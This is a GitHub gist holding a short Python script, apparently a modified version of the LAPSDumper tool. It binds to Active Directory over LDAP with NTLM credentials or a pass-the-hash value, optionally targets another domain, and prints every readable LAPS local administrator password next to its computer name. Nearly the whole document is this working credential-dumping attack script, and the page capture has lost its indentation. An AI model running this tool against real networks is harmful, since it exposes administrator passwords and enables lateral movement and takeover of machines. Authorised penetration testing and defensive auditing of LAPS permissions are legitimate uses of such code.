Skip to content

Instantly share code, notes, and snippets.

@jstnkndy
Created August 6, 2021 15:02
Show Gist options
  • Save jstnkndy/51fc44d95e4f8f5efb1b76a9d6cf920a to your computer and use it in GitHub Desktop.
Save jstnkndy/51fc44d95e4f8f5efb1b76a9d6cf920a to your computer and use it in GitHub Desktop.
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
#!/usr/bin/env python3
from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE
import argparse
parser = argparse.ArgumentParser(description='Dump LAPS Passwords')
parser.add_argument('-u','--username', help='username for LDAP', required=True)
parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True)
parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False)
parser.add_argument('-d','--domain', help='Domain', required=True)
parser.add_argument('-t', '--target', help="Target Domain", required=False)
def base_creator(domain):
search_base = ""
base = domain.split(".")
for b in base:
search_base += "DC=" + b + ","
return search_base[:-1]
def main():
args = parser.parse_args()
if args.ldapserver:
s = Server(args.ldapserver, get_info=ALL)
else:
s = Server(args.domain, get_info=ALL)
c = Connection(s, user=args.domain + "\\" + args.username, password=args.password, authentication=NTLM, auto_bind=True)
if args.target:
targetdomain = base_creator(args.target)
else:
targetdomain = base_creator(args.domain)
c.search(search_base=targetdomain, search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))',attributes=['ms-MCS-AdmPwd','SAMAccountname'])
for entry in c.entries:
print (str(entry['sAMAccountName']) +":"+ str(entry['ms-Mcs-AdmPwd']))
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment